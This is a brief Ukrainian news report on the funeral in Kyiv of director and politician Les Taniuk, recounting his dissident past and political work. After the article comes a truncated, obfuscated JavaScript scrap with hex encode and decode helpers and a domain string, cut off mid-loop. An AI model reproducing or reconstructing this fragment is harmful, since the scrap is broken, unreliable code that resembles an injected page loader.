У Києві попрощалися з відомим режисером

Переглядів: 181
У Києві попрощалися з відомим режисером

У Києві попрощалися із видатним режисером, громадським діячем і політиком Лесем Танюком. Його вистави забороняли, а за переконання переслідували. Усе життя він боровся за майбутнє України. Та багато із запланованого зробити не встиг. 18 березня на 78 році життя Леонід Степанович Танюк помер від раку.Новину передає OnPress.info.

Видатний режисер зробив величезний внесок у становлення незалежної української держави. Лесь Танюк є співавтором закону про «Про Державний герб України», а 1991 року був одним з ініціаторів заборони Комуністичної партії.

Також згадують Танюка як людину із великим серцем. Він разом із дружиною Неллі Корнієнко завжди приймали у себе вдома дисидентів після ув’язнення.

Поховали великого українця на Байковому кладовищі.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "onpress.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Жми «Нравится» и читай наши лучшие посты в своей ленте.

Читати в соцмережах